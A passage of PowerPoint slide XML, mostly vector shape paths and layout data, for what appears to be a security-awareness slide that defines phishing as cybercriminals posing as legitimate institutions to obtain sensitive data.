                    <a:pt x="42340" y="3873"/>
                    <a:pt x="31755" y="5637"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39253" y="14458"/>
                    <a:pt x="44545" y="25484"/>
                    <a:pt x="35724" y="32100"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26462" y="39598"/>
                    <a:pt x="13672" y="37392"/>
                    <a:pt x="0" y="29454"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8380" y="30777"/>
                    <a:pt x="13231" y="31218"/>
                    <a:pt x="18083" y="32100"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26462" y="23720"/>
                    <a:pt x="3528" y="14899"/>
                    <a:pt x="19406" y="6961"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32196" y="345"/>
                    <a:pt x="44986" y="-5389"/>
                    <a:pt x="56894" y="8725"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="3F3536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243220B-EB19-4E1F-BB95-54170FA05D6E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1074502" y="3586255"/>
              <a:ext cx="44189" cy="27730"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 441 w 44189"/>
                <a:gd name="connsiteY0" fmla="*/ 6083 h 27730"/>
                <a:gd name="connsiteX1" fmla="*/ 41458 w 44189"/>
                <a:gd name="connsiteY1" fmla="*/ 4319 h 27730"/>
                <a:gd name="connsiteX2" fmla="*/ 43222 w 44189"/>
                <a:gd name="connsiteY2" fmla="*/ 6524 h 27730"/>
                <a:gd name="connsiteX3" fmla="*/ 39694 w 44189"/>
                <a:gd name="connsiteY3" fmla="*/ 26812 h 27730"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 44189"/>
                <a:gd name="connsiteY4" fmla="*/ 21519 h 27730"/>
                <a:gd name="connsiteX5" fmla="*/ 22052 w 44189"/>
                <a:gd name="connsiteY5" fmla="*/ 6083 h 27730"/>
                <a:gd name="connsiteX6" fmla="*/ 441 w 44189"/>
                <a:gd name="connsiteY6" fmla="*/ 6083 h 2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89" h="27730">
                  <a:moveTo>
                    <a:pt x="441" y="6083"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="13672" y="-5384"/>
                    <a:pt x="27786" y="2555"/>
                    <a:pt x="41458" y="4319"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42340" y="4319"/>
                    <a:pt x="45868" y="5201"/>
                    <a:pt x="43222" y="6524"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31314" y="11816"/>
                    <a:pt x="52043" y="22401"/>
                    <a:pt x="39694" y="26812"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33519" y="29017"/>
                    <a:pt x="14554" y="27253"/>
                    <a:pt x="0" y="21519"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30432" y="27694"/>
                    <a:pt x="11908" y="14022"/>
                    <a:pt x="22052" y="6083"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14554" y="2114"/>
                    <a:pt x="7498" y="5201"/>
                    <a:pt x="441" y="6083"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="362F2D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8BF8101-2E20-45CF-8442-FD304C648BF6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1057301" y="3565365"/>
              <a:ext cx="69243" cy="13740"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 69243"/>
                <a:gd name="connsiteY0" fmla="*/ 12417 h 13740"/>
                <a:gd name="connsiteX1" fmla="*/ 69243 w 69243"/>
                <a:gd name="connsiteY1" fmla="*/ 13740 h 13740"/>
                <a:gd name="connsiteX2" fmla="*/ 0 w 69243"/>
                <a:gd name="connsiteY2" fmla="*/ 12417 h 1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243" h="13740">
                  <a:moveTo>
                    <a:pt x="0" y="12417"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="22493" y="-4783"/>
                    <a:pt x="44986" y="-3901"/>
                    <a:pt x="69243" y="13740"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45868" y="5802"/>
                    <a:pt x="22934" y="68"/>
                    <a:pt x="0" y="12417"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="5D3A38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57A85C-3E87-4BB3-96D8-9C98E582BDCE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1208137" y="3540800"/>
              <a:ext cx="39693" cy="13166"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 39694 w 39693"/>
                <a:gd name="connsiteY0" fmla="*/ 2140 h 13166"/>
                <a:gd name="connsiteX1" fmla="*/ 0 w 39693"/>
                <a:gd name="connsiteY1" fmla="*/ 13166 h 13166"/>
                <a:gd name="connsiteX2" fmla="*/ 39694 w 39693"/>
                <a:gd name="connsiteY2" fmla="*/ 2140 h 1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93" h="13166">
                  <a:moveTo>
                    <a:pt x="39694" y="2140"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="26462" y="5227"/>
                    <a:pt x="12349" y="5227"/>
                    <a:pt x="0" y="13166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10585" y="-1388"/>
                    <a:pt x="24698" y="-1829"/>
                    <a:pt x="39694" y="2140"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="654343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A226F05-B9F0-4C54-9315-B8E9E07BD16D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5108548" y="5579443"/>
              <a:ext cx="349104" cy="693425"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 347539 w 349104"/>
                <a:gd name="connsiteY0" fmla="*/ 491318 h 693425"/>
                <a:gd name="connsiteX1" fmla="*/ 329457 w 349104"/>
                <a:gd name="connsiteY1" fmla="*/ 486026 h 693425"/>
                <a:gd name="connsiteX2" fmla="*/ 284912 w 349104"/>
                <a:gd name="connsiteY2" fmla="*/ 538510 h 693425"/>
                <a:gd name="connsiteX3" fmla="*/ 293733 w 349104"/>
                <a:gd name="connsiteY3" fmla="*/ 555269 h 693425"/>
                <a:gd name="connsiteX4" fmla="*/ 305200 w 349104"/>
                <a:gd name="connsiteY4" fmla="*/ 572029 h 693425"/>
                <a:gd name="connsiteX5" fmla="*/ 254039 w 349104"/>
                <a:gd name="connsiteY5" fmla="*/ 637744 h 693425"/>
                <a:gd name="connsiteX6" fmla="*/ 188324 w 349104"/>
                <a:gd name="connsiteY6" fmla="*/ 654062 h 693425"/>
                <a:gd name="connsiteX7" fmla="*/ 68361 w 349104"/>
                <a:gd name="connsiteY7" fmla="*/ 518663 h 693425"/>
                <a:gd name="connsiteX8" fmla="*/ 67920 w 349104"/>
                <a:gd name="connsiteY8" fmla="*/ 202437 h 693425"/>
                <a:gd name="connsiteX9" fmla="*/ 59982 w 349104"/>
                <a:gd name="connsiteY9" fmla="*/ 193617 h 693425"/>
                <a:gd name="connsiteX10" fmla="*/ 59982 w 349104"/>
                <a:gd name="connsiteY10" fmla="*/ 96588 h 693425"/>
                <a:gd name="connsiteX11" fmla="*/ 97911 w 349104"/>
                <a:gd name="connsiteY11" fmla="*/ 48956 h 693425"/>
                <a:gd name="connsiteX12" fmla="*/ 48956 w 349104"/>
                <a:gd name="connsiteY12" fmla="*/ 0 h 693425"/>
                <a:gd name="connsiteX13" fmla="*/ 0 w 349104"/>
                <a:gd name="connsiteY13" fmla="*/ 48956 h 693425"/>
                <a:gd name="connsiteX14" fmla="*/ 37930 w 349104"/>
                <a:gd name="connsiteY14" fmla="*/ 96588 h 693425"/>
                <a:gd name="connsiteX15" fmla="*/ 37930 w 349104"/>
                <a:gd name="connsiteY15" fmla="*/ 193617 h 693425"/>
                <a:gd name="connsiteX16" fmla="*/ 29991 w 349104"/>
                <a:gd name="connsiteY16" fmla="*/ 202437 h 693425"/>
                <a:gd name="connsiteX17" fmla="*/ 31314 w 349104"/>
                <a:gd name="connsiteY17" fmla="*/ 536746 h 693425"/>
                <a:gd name="connsiteX18" fmla="*/ 111142 w 349104"/>
                <a:gd name="connsiteY18" fmla="*/ 669940 h 693425"/>
                <a:gd name="connsiteX19" fmla="*/ 277855 w 349104"/>
                <a:gd name="connsiteY19" fmla="*/ 667293 h 693425"/>
                <a:gd name="connsiteX20" fmla="*/ 320636 w 349104"/>
                <a:gd name="connsiteY20" fmla="*/ 626277 h 693425"/>
                <a:gd name="connsiteX21" fmla="*/ 347539 w 349104"/>
                <a:gd name="connsiteY21" fmla="*/ 491318 h 693425"/>
                <a:gd name="connsiteX22" fmla="*/ 25580 w 349104"/>
                <a:gd name="connsiteY22" fmla="*/ 49838 h 693425"/>
                <a:gd name="connsiteX23" fmla="*/ 49397 w 349104"/>
                <a:gd name="connsiteY23" fmla="*/ 26021 h 693425"/>
                <a:gd name="connsiteX24" fmla="*/ 73213 w 349104"/>
                <a:gd name="connsiteY24" fmla="*/ 49838 h 693425"/>
                <a:gd name="connsiteX25" fmla="*/ 49397 w 349104"/>
                <a:gd name="connsiteY25" fmla="*/ 73654 h 693425"/>
                <a:gd name="connsiteX26" fmla="*/ 25580 w 349104"/>
                <a:gd name="connsiteY26" fmla="*/ 49838 h 69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9104" h="693425">
                  <a:moveTo>
                    <a:pt x="347539" y="491318"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="346657" y="478087"/>
                    <a:pt x="338719" y="475882"/>
                    <a:pt x="329457" y="486026"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="313579" y="502785"/>
                    <a:pt x="298584" y="520427"/>
                    <a:pt x="284912" y="538510"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="276091" y="550418"/>
                    <a:pt x="279178" y="555710"/>
                    <a:pt x="293733" y="555269"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="307846" y="554828"/>
                    <a:pt x="309169" y="561444"/>
                    <a:pt x="305200" y="572029"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="295938" y="599814"/>
                    <a:pt x="280060" y="622748"/>
                    <a:pt x="254039" y="637744"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="233310" y="648329"/>
                    <a:pt x="212140" y="655826"/>
                    <a:pt x="188324" y="654062"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="116876" y="648770"/>
                    <a:pt x="66156" y="593199"/>
                    <a:pt x="68361" y="518663"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69243" y="489995"/>
                    <a:pt x="67920" y="202437"/>
                    <a:pt x="67920" y="202437"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67920" y="198027"/>
                    <a:pt x="64392" y="194058"/>
                    <a:pt x="59982" y="193617"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="59982" y="96588"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="81592" y="91736"/>
                    <a:pt x="97911" y="72331"/>
                    <a:pt x="97911" y="48956"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="97911" y="22052"/>
                    <a:pt x="75859" y="0"/>
                    <a:pt x="48956" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22052" y="0"/>
                    <a:pt x="0" y="22052"/>
                    <a:pt x="0" y="48956"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="71890"/>
                    <a:pt x="16319" y="91295"/>
                    <a:pt x="37930" y="96588"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="37930" y="193617"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="33519" y="194058"/>
                    <a:pt x="29991" y="197586"/>
                    <a:pt x="29991" y="202437"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29991" y="202437"/>
                    <a:pt x="31314" y="509401"/>
                    <a:pt x="31314" y="536746"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31755" y="595845"/>
                    <a:pt x="58217" y="641713"/>
                    <a:pt x="111142" y="669940"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="166713" y="699930"/>
                    <a:pt x="222725" y="703458"/>
                    <a:pt x="277855" y="667293"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="294615" y="655826"/>
                    <a:pt x="308728" y="643036"/>
                    <a:pt x="320636" y="626277"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="351068" y="585701"/>
                    <a:pt x="351068" y="538951"/>
                    <a:pt x="347539" y="491318"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="25580" y="49838"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="25580" y="36607"/>
                    <a:pt x="36165" y="26021"/>
                    <a:pt x="49397" y="26021"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62628" y="26021"/>
                    <a:pt x="73213" y="36607"/>
                    <a:pt x="73213" y="49838"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73213" y="63069"/>
                    <a:pt x="62628" y="73654"/>
                    <a:pt x="49397" y="73654"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36165" y="73654"/>
                    <a:pt x="25580" y="63069"/>
                    <a:pt x="25580" y="49838"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="010101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1" name="&quot;Not Allowed&quot; Symbol 70">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3488D99D-F21B-4558-9FDA-75BA61085D05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1042441" y="2224604"/>
            <a:ext cx="1267006" cy="1267006"/>
          </a:xfrm>
          <a:prstGeom prst="noSmoking">
            <a:avLst>
              <a:gd name="adj" fmla="val 68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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D284BF9-48CE-408B-B5EC-985AC6D3A142}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6179695" y="4482897"/>
            <a:ext cx="1437812" cy="1412058"/>
            <a:chOff x="1619672" y="1450893"/>
            <a:chExt cx="931911" cy="915215"/>
          </a:xfrm>
          <a:scene3d>
            <a:camera prst="isometricOffAxis2Right">
              <a:rot lat="0" lon="18600000" rev="1080000"/>
            </a:camera>
            <a:lightRig rig="threePt" dir="t"/>
          </a:scene3d>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="96" name="Group 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CA693B0-C6E8-458F-A1BB-584B078750E1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1619672" y="1450893"/>
              <a:ext cx="931911" cy="803372"/>
              <a:chOff x="2731306" y="5021709"/>
              <a:chExt cx="1863824" cy="1606745"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="98" name="Isosceles Triangle 11">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7784821E-F45F-451A-8EAB-8D70EB3F2706}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2843808" y="5156793"/>
                <a:ext cx="1638820" cy="141277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9" name="Isosceles Triangle 12">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4005D109-FC5C-4309-8348-16CB2F0C4127}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2731306" y="5021709"/>
                <a:ext cx="1863824" cy="1606745"/>
              </a:xfrm>
              <a:prstGeom prst="triangl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7B5EA61-8060-429D-A7A3-281DEC1D19D7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1840076" y="1491605"/>
              <a:ext cx="510152" cy="8745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7C84A273-0B0E-408C-8887-629AD325CC2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3512651" y="1934744"/>
            <a:ext cx="2101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Phishing is an attempt by cybercriminals posing as legitimate institutions, usually via email in order to obtain sensitive data from the target.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15406A-A6F5-43D4-9C89-CEFB151A3CA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3512651" y="1544705"/>
            <a:ext cx="21012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500" b="1" dirty="0">
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Phishing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II, Payload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B42B-14CA-4E81-806F-6104B1EFC216}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7496004" y="1920263"/>
            <a:ext cx="3864628" cy="3896248"/>
            <a:chOff x="7496004" y="1920263"/>
            <a:chExt cx="3864628" cy="3896248"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Isosceles Triangle 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D857AEF3-2BAB-4B10-A92B-50F6B5652C4C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839502" y="4413955"/>
              <a:ext cx="427534" cy="471394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3E9BF2E0-BB0D-492B-B23D-18525C8DC865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7608221" y="2961416"/>
              <a:ext cx="392828" cy="319096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 Same Side Corner Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F874CADC-9EE2-4426-B491-ED504626F9E7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000" flipH="1">
              <a:off x="10824557" y="291708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CF6CB40C-AAE3-4BC0-BE1A-A2168066A4DC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11062223" y="3784811"/>
              <a:ext cx="285020" cy="285020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24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD6FAF72-CA89-49D3-B9C9-BC90661F2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7159" y="2346892"/>
              <a:ext cx="392828" cy="3039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Isosceles Triangle 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A45748F-6022-4AD8-BF16-FE4B5FA61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619" y="5355763"/>
              <a:ext cx="372889" cy="259826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2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4BD8663-EF58-4C8A-AD10-8B9671E1C8E3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="2498363">
              <a:off x="8831623" y="1920263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A76A8299-3263-47DF-B0DC-CFD8E87EA586}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="19470155">
              <a:off x="10110329" y="1972655"/>
              <a:ext cx="132806" cy="502999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2" name="자유형: 도형 94">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DAE9AE7-5A5C-4C0B-A820-235CA68F560D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="13500000">
              <a:off x="9503918" y="5364438"/>
              <a:ext cx="71616" cy="502304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C623668A-E552-4FA0-A1ED-1AFADAD25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073" y="5282722"/>
              <a:ext cx="141778" cy="392828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33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02331B79-8E44-4749-B2E2-C6816EB456CB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="9233259" y="1922064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30243713-6F14-4FF0-949D-ABED94C7AA9C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8136976" y="5049647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5CB07C1-BE6E-406A-AB6E-734C2C1E8101}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9626515" y="1969444"/>
              <a:ext cx="330976" cy="339180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2C0B57BA-B464-44AF-84E3-35CE5FDD7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5361" y="4863776"/>
              <a:ext cx="330939" cy="234666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7D2BFFAC-4745-4323-A6BF-5D92BA1E2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475" y="4673961"/>
              <a:ext cx="330939" cy="330692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ounded Rectangle 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B52C9B96-B6E8-4A0F-B777-A4F587CA6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9746" y="4139499"/>
              <a:ext cx="330940" cy="232884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66C83CF2-9280-44CE-88E6-50B6B5A58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44" y="5398653"/>
              <a:ext cx="300703" cy="366439"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3240944" h="3949460">
                  <a:moveTo>
                    <a:pt x="2411668" y="919204"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2652037" y="921566"/>
                    <a:pt x="2997179" y="1088232"/>
                    <a:pt x="3147060" y="1333480"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2837519" y="1559133"/>
                    <a:pt x="2713715" y="1818123"/>
                    <a:pt x="2716116" y="2148550"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2724370" y="2506677"/>
                    <a:pt x="2937416" y="2788602"/>
                    <a:pt x="3240944" y="2908604"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3111039" y="3296832"/>
                    <a:pt x="2835874" y="3920800"/>
                    <a:pt x="2360688" y="3949460"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2104982" y="3948826"/>
                    <a:pt x="1887379" y="3871989"/>
                    <a:pt x="1655487" y="3790391"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1465920" y="3881513"/>
                    <a:pt x="1178719" y="3984543"/>
                    <a:pt x="936764" y="3932790"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="634032" y="3867349"/>
                    <a:pt x="33306" y="3304229"/>
                    <a:pt x="0" y="2002921"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5122" y="1625861"/>
                    <a:pt x="224231" y="988116"/>
                    <a:pt x="1004287" y="951010"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1237754" y="955627"/>
                    <a:pt x="1430737" y="1013358"/>
                    <a:pt x="1654678" y="1150601"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1907007" y="1025844"/>
                    <a:pt x="2042657" y="934423"/>
                    <a:pt x="2411668" y="919204"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2423572" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2449670" y="236641"/>
                    <a:pt x="2449574" y="370890"/>
                    <a:pt x="2275646" y="605149"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2098536" y="787863"/>
                    <a:pt x="1909519" y="903902"/>
                    <a:pt x="1627634" y="908022"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1601565" y="662380"/>
                    <a:pt x="1689794" y="371496"/>
                    <a:pt x="1823269" y="256823"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1945582" y="131527"/>
                    <a:pt x="2156003" y="39571"/>
                    <a:pt x="242357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4A3EBE81-5E07-4BBC-98BC-BA89E0429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500" y="2582839"/>
              <a:ext cx="300170" cy="347427"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3319870" h="3842533">
                  <a:moveTo>
                    <a:pt x="579936" y="1296382"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2739936" y="1296382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2739936" y="2796543"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2739936" y="2962250"/>
                    <a:pt x="2605604" y="3096582"/>
                    <a:pt x="2439897" y="3096582"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2272003" y="3096582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2272003" y="3590505"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2272003" y="3729696"/>
                    <a:pt x="2159166" y="3842533"/>
                    <a:pt x="2019975" y="3842533"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1880784" y="3842533"/>
                    <a:pt x="1767947" y="3729696"/>
                    <a:pt x="1767947" y="3590505"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1767947" y="3096582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1492066" y="3096582"/>
                  </a:lnTo>
                  <a:lnTo>
